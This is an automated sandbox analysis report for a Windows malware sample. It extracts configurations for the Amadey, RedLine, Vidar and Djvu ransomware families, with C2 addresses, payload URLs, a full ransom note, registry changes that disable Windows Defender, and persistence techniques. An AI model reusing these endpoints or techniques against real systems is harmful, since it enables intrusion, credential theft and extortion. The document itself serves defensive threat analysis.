Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
31-01-2023 15:21
Behavioral task
behavioral1
Sample
f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe
Resource
win10v2004-20220812-en
General
-
Target
f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe
-
Size
235KB
-
MD5
67bb41448f41511e169c83230d7e9486
-
SHA1
dde5a6577a966a9e8713e66ad7ef50b840dd114e
-
SHA256
f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914da4e04aee13df10007b
-
SHA512
84baf5659cee4e55f48ea0523e2f30c5c6d696d5881da7f628cb4450f1dfc949396ee48cbded60dc98b53483aeb5cdf7fbe4970ab612049356185f2aadf02d84
-
SSDEEP
6144:ILUoeyDABOdDubDXqgraG0JzSRuVyL+VY9QqgE:Ilu0LgwJ4uVyaVgJ
Malware Config
Extracted
amadey
3.66
62.204.41.72/hn85jlUn/index.php
62.204.41.88/9vdVVVjsw/index.php
Extracted
redline
druid
62.204.41.170:4132
-
auth_value
fddcb4126f1d0ea4ac975511b3530e72
Extracted
redline
new1
176.113.115.16:4122
-
auth_value
ac44cbde6633acc9d67419c7278d5c70
Extracted
redline
temp45645645
82.115.223.9:15486
-
auth_value
f7fe7a35c673cce3fa35569cf455f570
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Extracted
djvu
http://drampik.com/raud/get.php
-
extension
.assm
-
offline_id
ex4uvTKsM2vEkIcr3MjXi2C6v27h1mS682iUXGt1
-
payload_url
http://uaery.top/dl/build2.exe
http://drampik.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-wY6g3rkhZz Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0638JOsie
Extracted
vidar
2.3
19
https://t.me/mantarlars
https://steamcommunity.com/profiles/76561199474840123
-
profile_id
19
Signatures
-
Detect rhadamanthys stealer shellcode 5 IoCs
Processes:
resource yara_rule behavioral2/memory/3952-237-0x0000000000580000-0x000000000059D000-memory.dmp family_rhadamanthys behavioral2/memory/4528-278-0x0000000000F10000-0x0000000000F2D000-memory.dmp family_rhadamanthys behavioral2/memory/3952-287-0x0000000000580000-0x000000000059D000-memory.dmp family_rhadamanthys behavioral2/memory/4844-295-0x0000000000690000-0x00000000006AD000-memory.dmp family_rhadamanthys behavioral2/memory/4844-332-0x0000000000690000-0x00000000006AD000-memory.dmp family_rhadamanthys -
Detected Djvu ransomware 7 IoCs
Processes:
resource yara_rule behavioral2/memory/1020-313-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1020-315-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1020-318-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4408-319-0x0000000002240000-0x000000000235B000-memory.dmp family_djvu behavioral2/memory/1020-323-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/604-382-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/604-384-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Processes:
moda1.exemoda.exetrena1.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" moda1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" moda1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" moda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" moda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" trena1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" trena1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" trena1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" moda1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" moda1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection moda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" moda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" moda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" trena1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" trena1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" moda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" moda1.exe -
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1340 4572 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 14 IoCs
Processes:
OwvtknErB0Wl.exeXandETC.exeupdater.execonhost.exedescription pid process target process PID 2332 created 2672 2332 OwvtknErB0Wl.exe taskhostw.exe PID 4204 created 376 4204 XandETC.exe Explorer.EXE PID 4204 created 376 4204 XandETC.exe Explorer.EXE PID 4204 created 376 4204 XandETC.exe Explorer.EXE PID 4204 created 376 4204 XandETC.exe Explorer.EXE PID 4204 created 376 4204 XandETC.exe Explorer.EXE PID 1680 created 376 1680 updater.exe Explorer.EXE PID 1680 created 376 1680 updater.exe Explorer.EXE PID 1680 created 376 1680 updater.exe Explorer.EXE PID 1680 created 376 1680 updater.exe Explorer.EXE PID 1680 created 376 1680 updater.exe Explorer.EXE PID 1680 created 376 1680 updater.exe Explorer.EXE PID 2340 created 376 2340 conhost.exe Explorer.EXE PID 1680 created 376 1680 updater.exe Explorer.EXE -
Blocklisted process makes network request 5 IoCs
Processes:
rundll32.exepowershell.exerundll32.exeflow pid process 86 2948 rundll32.exe 150 2708 powershell.exe 177 1620 rundll32.exe 187 2708 powershell.exe 202 2708 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 41 IoCs
Processes:
nbveek.exemoda.exetrena1.exedruid1.exenitka.exemoda1.exedruid.exenitka1.exelebro.exenbveek.exefular.exeOwvtknErB0Wl.exefular1.exevina.exePlayer3.exenbveek.exevina1.execc.exeuplagin.exeraud-290123del700_2023-01-29_12-52.exepb1111.exejn-17L.exeLummaC2.exevideo.exerandom.exerandom.exeXandETC.exeEngine.exeraud-290123del700_2023-01-29_12-52.exeChromeSetup.exeraud-290123del700_2023-01-29_12-52.exeRussian.exe.pifraud-290123del700_2023-01-29_12-52.exenbveek.exebuild2.exebuild3.exebuild2.exe9308.exeupdater.exenbveek.exemstsca.exepid process 628 nbveek.exe 4320 moda.exe 3348 trena1.exe 4124 druid1.exe 3200 nitka.exe 260 moda1.exe 3232 druid.exe 4976 nitka1.exe 3168 lebro.exe 3376 nbveek.exe 2908 fular.exe 2332 OwvtknErB0Wl.exe 432 fular1.exe 4740 vina.exe 2720 Player3.exe 3328 nbveek.exe 3952 vina1.exe 4844 cc.exe 1620 uplagin.exe 4408 raud-290123del700_2023-01-29_12-52.exe 3120 pb1111.exe 2588 jn-17L.exe 1056 LummaC2.exe 2376 video.exe 3456 random.exe 4128 random.exe 4204 XandETC.exe 4428 Engine.exe 1020 raud-290123del700_2023-01-29_12-52.exe 2656 ChromeSetup.exe 3348 raud-290123del700_2023-01-29_12-52.exe 1444 Russian.exe.pif 604 raud-290123del700_2023-01-29_12-52.exe 3832 nbveek.exe 4304 build2.exe 1336 build3.exe 2220 build2.exe 2656 9308.exe 1680 updater.exe 3708 nbveek.exe 4912 mstsca.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\SETUP_33455\Engine.exe upx C:\Users\Admin\AppData\Local\Temp\SETUP_33455\Engine.exe upx behavioral2/memory/4428-299-0x0000000000400000-0x0000000000558000-memory.dmp upx -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe vmprotect C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe vmprotect behavioral2/memory/3120-257-0x0000000140000000-0x000000014061A000-memory.dmp vmprotect -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
lebro.exenbveek.exenbveek.exerandom.exejn-17L.exeraud-290123del700_2023-01-29_12-52.exef3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exenbveek.exeRussian.exe.pifraud-290123del700_2023-01-29_12-52.exePlayer3.exevideo.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation lebro.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation random.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation jn-17L.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation raud-290123del700_2023-01-29_12-52.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Russian.exe.pif Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation raud-290123del700_2023-01-29_12-52.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Player3.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation video.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zge41g4apb0.lnk powershell.exe -
Loads dropped DLL 14 IoCs
Processes:
OwvtknErB0Wl.exerundll32.exesvchost.exevideo.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exeRussian.exe.pifpid process 2332 OwvtknErB0Wl.exe 2948 rundll32.exe 4784 svchost.exe 2376 video.exe 2376 video.exe 5000 rundll32.exe 3516 rundll32.exe 3512 rundll32.exe 2180 rundll32.exe 920 rundll32.exe 4280 rundll32.exe 1620 rundll32.exe 1444 Russian.exe.pif 1444 Russian.exe.pif -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
moda1.exemoda.exetrena1.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" moda1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" moda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" trena1.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook rundll32.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
nbveek.exeraud-290123del700_2023-01-29_12-52.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\druid.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000006051\\druid.exe" nbveek.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a7e592f1-b46b-45d4-965a-f2891e354357\\raud-290123del700_2023-01-29_12-52.exe\" --AutoStart" raud-290123del700_2023-01-29_12-52.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\druid1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000003051\\druid1.exe" nbveek.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nitka.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000004051\\nitka.exe" nbveek.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 124 api.2ip.ua 52 api.ipify.org 81 api.2ip.ua 82 api.2ip.ua -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
vina1.exepid process 3952 vina1.exe 3952 vina1.exe 3952 vina1.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
OwvtknErB0Wl.exeraud-290123del700_2023-01-29_12-52.exeraud-290123del700_2023-01-29_12-52.exebuild2.exerundll32.exeupdater.exedescription pid process target process PID 2332 set thread context of 1268 2332 OwvtknErB0Wl.exe ngentask.exe PID 4408 set thread context of 1020 4408 raud-290123del700_2023-01-29_12-52.exe raud-290123del700_2023-01-29_12-52.exe PID 3348 set thread context of 604 3348 raud-290123del700_2023-01-29_12-52.exe raud-290123del700_2023-01-29_12-52.exe PID 4304 set thread context of 2220 4304 build2.exe build2.exe PID 1620 set thread context of 3948 1620 rundll32.exe rundll32.exe PID 1680 set thread context of 2340 1680 updater.exe conhost.exe PID 1680 set thread context of 3724 1680 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
XandETC.exeupdater.execmd.execmd.exedescription ioc process File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3400 sc.exe 3456 sc.exe 1776 sc.exe 1008 sc.exe 1124 sc.exe 4124 sc.exe 4828 sc.exe 4584 sc.exe 4780 sc.exe 4024 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 13 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4320 2332 WerFault.exe OwvtknErB0Wl.exe 3656 2332 WerFault.exe OwvtknErB0Wl.exe 2896 3200 WerFault.exe nitka.exe 5088 4844 WerFault.exe cc.exe 2492 4784 WerFault.exe rundll32.exe 1684 4976 WerFault.exe nitka1.exe 4740 432 WerFault.exe fular1.exe 2340 2948 WerFault.exe rundll32.exe 1792 2376 WerFault.exe video.exe 5112 2220 WerFault.exe build2.exe 1344 3512 WerFault.exe rundll32.exe 3948 4280 WerFault.exe rundll32.exe 3048 2656 WerFault.exe 9308.exe -
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vina1.exeChromeSetup.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vina1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ChromeSetup.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ChromeSetup.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ChromeSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vina1.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID vina1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vina1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vina1.exe -
Checks processor information in registry 2 TTPs 30 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
rundll32.exeRussian.exe.pifsvchost.exesvchost.exevideo.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Russian.exe.pif Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information rundll32.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 video.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString video.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Russian.exe.pif Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status rundll32.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier rundll32.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4964 schtasks.exe 3264 schtasks.exe 1976 schtasks.exe 4392 schtasks.exe 3092 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 3168 timeout.exe 3152 timeout.exe -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created 